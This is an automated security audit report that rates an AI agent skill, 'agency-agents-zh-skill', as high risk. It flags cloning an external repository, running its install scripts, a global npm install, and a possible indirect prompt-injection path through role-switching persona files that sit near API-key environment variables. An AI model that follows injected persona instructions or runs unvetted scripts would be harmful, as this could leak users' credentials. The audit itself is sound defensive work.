agency-agents-zh-skill
Fail
Audited by Gen Agent Trust Hub on May 16, 2026
Risk Level: HIGHEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill instructs users to clone a remote repository from a non-whitelisted source:
https://github.com/jnMetaCode/agency-agents-zh.git. - [REMOTE_CODE_EXECUTION]: The installation process involves executing local shell scripts (
./scripts/install.shand./scripts/convert.sh) immediately after cloning the external repository. These scripts have the capability to execute arbitrary commands on the user's machine. - [COMMAND_EXECUTION]: The skill directs the user to install a global Node.js package
agency-orchestratorusingnpm install -g, which originates from an untrusted third-party source and possesses significant control over the environment. - [PROMPT_INJECTION]: While primarily instructional, the skill contains directions to "activate" or "switch" to specific expert roles, which could be used as a vector for indirect prompt injection if the persona files themselves contain malicious instructions (though this depends on the content of the external repository).
- [DATA_EXFILTRATION]: The skill documentation lists various sensitive environment variables for API keys (e.g.,
DEEPSEEK_API_KEY,FEISHU_APP_SECRET). While it follows the safe practice of using.envfiles, the combination of third-party script execution and the presence of these keys creates a risk surface for potential exfiltration.
Recommendations
- AI detected serious security threats
Audit Metadata